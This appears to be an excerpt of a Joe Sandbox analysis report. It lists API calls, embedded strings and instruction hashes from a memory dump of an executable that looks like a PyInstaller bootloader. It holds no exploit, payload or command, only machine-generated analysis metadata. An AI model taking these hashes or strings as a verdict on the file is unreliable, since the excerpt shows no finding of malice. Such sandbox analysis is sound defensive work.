                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                    • API String ID: 190572456-2208601799
                                                    • Opcode ID: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                    • Instruction ID: c579ba99fa0a5b56ce965958822bc80d806c52348fa23ec8eef5a03628f233d6
                                                    • Opcode Fuzzy Hash: e7edea845a9f5d5bc22b5b56991a1be592abbf01ed24a972618679d5ebca8c04
                                                    • Instruction Fuzzy Hash: 3FE1E461A1DB2391FB59CB04BC8017523A2AF4479CF9C663DD80EA63A4EFFCF5588250
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message_fread_nolock
                                                    • String ID: %s%c%s$Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$\$fread$fseek$malloc
                                                    • API String ID: 3065259568-2316137593
                                                    • Opcode ID: 8e0a080ed0e30a437069437fae51ddaf79e1ee31648d61ffe3286270281b1de1
                                                    • Instruction ID: dd3d29c2eeef47ad8201db157ae821b146e0d963f2199fea14814243bb89aa13
                                                    • Opcode Fuzzy Hash: 8e0a080ed0e30a437069437fae51ddaf79e1ee31648d61ffe3286270281b1de1
                                                    • Instruction Fuzzy Hash: 19517262A096A346EB209711EC513FA6354AF847C8F58503DEE4DEB696EEBCF5458300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                    • String ID: P%
                                                    • API String ID: 2147705588-2959514604
                                                    • Opcode ID: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                    • Instruction ID: 91cbd18f2c9ad51c3453b48e4f2be49816e486fa4a7893bd7a8195edd608d841
                                                    • Opcode Fuzzy Hash: 5b6577cad5280a8981d528861e2ae7c646745b175b361903b18278a3a03fe9da
                                                    • Instruction Fuzzy Hash: 7B510426614BB186D6349F22B4181BBB7A1FB98B69F044129EFCE93684DF7CD045DB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: -$:$f$p$p
                                                    • API String ID: 3215553584-2013873522
                                                    • Opcode ID: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                    • Instruction ID: e17f13b99bf0515badb2700cbb4563e4420b20a1524fac18703135ab09a40c7b
                                                    • Opcode Fuzzy Hash: d41d3ed49e0df0b37e7753a00fe59ce424ede8ed11cb6504f669504b003b63f2
                                                    • Instruction Fuzzy Hash: B412D721E0C26386FB609F15D8446BD7661FB80758F9C413DE699A76C8DFBCE980CB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: f$f$p$p$f
                                                    • API String ID: 3215553584-1325933183
                                                    • Opcode ID: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                    • Instruction ID: c2247588ec34ee3bde328560407cfaee526decead260e85659243b12e073afad
                                                    • Opcode Fuzzy Hash: d738f100ea2c585e80d131aafbe2a69e2e0acbd3b76fe5cf90b2b638373c2978
                                                    • Instruction Fuzzy Hash: 0212B561E0C1A386FB249A15DC542B97661FB80758F9C4139E69AEE6C4DFBCECC0CB11
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Message
                                                    • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                    • API String ID: 2030045667-3659356012
                                                    • Opcode ID: 78e786674cf019aa4bfc43b56c2618f7f7dd3a536dd5cfde84b8df6acfdb4e98
                                                    • Instruction ID: ef33cb4c3f559cedaaf8ba331cb47bb10f40adfc616c58131f082e6563a2d6de
                                                    • Opcode Fuzzy Hash: 78e786674cf019aa4bfc43b56c2618f7f7dd3a536dd5cfde84b8df6acfdb4e98
                                                    • Instruction Fuzzy Hash: 38318122B186A346EB20DB12FC415BA6391EF847D8F5C503DDE4DBBA95EEBCE5458300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                    • Instruction ID: 26df71eb3239da0fc25ea038fc197c2d4c8abb27aae9c353821dc4219bfe4f6b
                                                    • Opcode Fuzzy Hash: 0e2dbf0607b23b863384daf6af73d36f13a88af7ca772ada99fba3557138c94c
                                                    • Instruction Fuzzy Hash: A4D1B372A087628AEB20DF65D8402AD37A0FB8579CF18413DEE8DA7B55DF78E491C740
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8A47
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8A9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    APIs
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF652ED39CA), ref: 00007FF652ED8F31
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    • WideCharToMultiByte.KERNEL32(?,00007FF652ED39CA), ref: 00007FF652ED8FA5
                                                    Strings
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$_fread_nolock
                                                    • String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE44D
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE45B
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE485
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE4F3
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FF652EDE67A,?,?,?,00007FF652EDD5AC,?,?,?,00007FF652EDD1A1), ref: 00007FF652EDE4FF
                                                    Strings
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    APIs
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF652ED7BB1,00000000,?,00000000,00000000,?,00007FF652ED153F), ref: 00007FF652ED768F
                                                      • Part of subcall function 00007FF652ED2B10: MessageBoxW.USER32 ref: 00007FF652ED2BE5
                                                    Strings
                                                    • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF652ED76EA
                                                    • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF652ED7666
                                                    • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF652ED76A3
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                    • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                      • Part of subcall function 00007FF652ED29C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED29C0: MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8EA0
                                                    Strings
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLastMessage
                                                    • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                    APIs
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC087
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC0BD
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC0EA
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC0FB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC10C
                                                    • SetLastError.KERNEL32(?,?,?,00007FF652EE5CBD,?,?,?,?,00007FF652EEF9AF,?,?,00000000,00007FF652EEC196,?,?,?), ref: 00007FF652EEC127
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                    • String ID: Unhandled exception in script
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF652ED8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED29F4
                                                      • Part of subcall function 00007FF652ED8770: GetLastError.KERNEL32(00000000,00007FF652ED2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF652ED101D), ref: 00007FF652ED8797
                                                      • Part of subcall function 00007FF652ED8770: FormatMessageW.KERNEL32 ref: 00007FF652ED87C6
                                                      • Part of subcall function 00007FF652ED8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF652ED2A9B), ref: 00007FF652ED8E1A
                                                    • MessageBoxW.USER32 ref: 00007FF652ED2AD0
                                                    • MessageBoxA.USER32 ref: 00007FF652ED2AEC
                                                    Strings
                                                    Similarity
                                                    • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                    • String ID: %s%s: %s$Fatal error detected
                                                    APIs
                                                    Strings
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                    • Instruction ID: 453b6af5bd3276c8744376e144b0f12a859824e0d3f1b5ad21747277901d0f88
                                                    • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                    • Instruction Fuzzy Hash: 60F0C822B1961281FB14CB14FC493762320AF48758F58163DD96EA52E0CF7CD049C300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                    • Instruction ID: 76320df5d3a2aa323283a08d25acff88b321842b32ddd231b2ef57166c6b0391
                                                    • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                    • Instruction Fuzzy Hash: 77114C26E18A3301FA541968FC5F37B31416F59378F1C0A3DED6EEE7D68EACA9404204
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC15F
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC17E
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC1A6
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC1B7
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF652EEB35B,?,?,00000000,00007FF652EEB5F6,?,?,?,?,?,00007FF652EE38BC), ref: 00007FF652EEC1C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                    • Instruction ID: bde152fcb718939de24e0540c0387afc69ff811c53b911d04445167de5cb40e3
                                                    • Opcode Fuzzy Hash: 10ef7b20446d589d7543043f1c539080fe2d32c680aee76621b2f3de37225325
                                                    • Instruction Fuzzy Hash: 72115B21F0C66341FA58A325AD4127921625F953B8F1C533DE83EF77DADEACE9418710
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                    • Instruction ID: cdc2394aa1b6935f94130d2580c91e3976bd9e4f6a439d7310929094302b390b
                                                    • Opcode Fuzzy Hash: 1cbfbab29873deef46e90a648d7a1f8795c58f1c293a930122e54ca216580eab
                                                    • Instruction Fuzzy Hash: 7F111711E0C22741FA69A335AC522BD12A25F4677CF2C173CD83EFA2D6DDBCB9428200
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: verbose
                                                    • API String ID: 3215553584-579935070
                                                    • Opcode ID: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                    • Instruction ID: e9401b1721d9d30f3831e2d12b45ef387a662f88f01b6bf8490cac09e98619b9
                                                    • Opcode Fuzzy Hash: 0e1375701995164762774767e6acc307974a31e0cd050619d1c211530d762839
                                                    • Instruction Fuzzy Hash: EE91C022A08A6741FB619E25D8603BD37A1EB42B9CF4C413ADA5DA73D5DFBCE4458340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                    • API String ID: 3215553584-1196891531
                                                    • Opcode ID: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                    • Instruction ID: 3bf0a956d6e36c34e37c1a363e213d2fd593eae589b754b957d2542478f37f57
                                                    • Opcode Fuzzy Hash: de4b53a7bd72cc9a75fc72bdb9aa8b7520de62a16ef0f4afa2e89dc7587c8b22
                                                    • Instruction Fuzzy Hash: 4F818632E0862285FA774F29E9502BA36A0AB11B4CF5D8039CA0DF729DDFBDF5059701
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
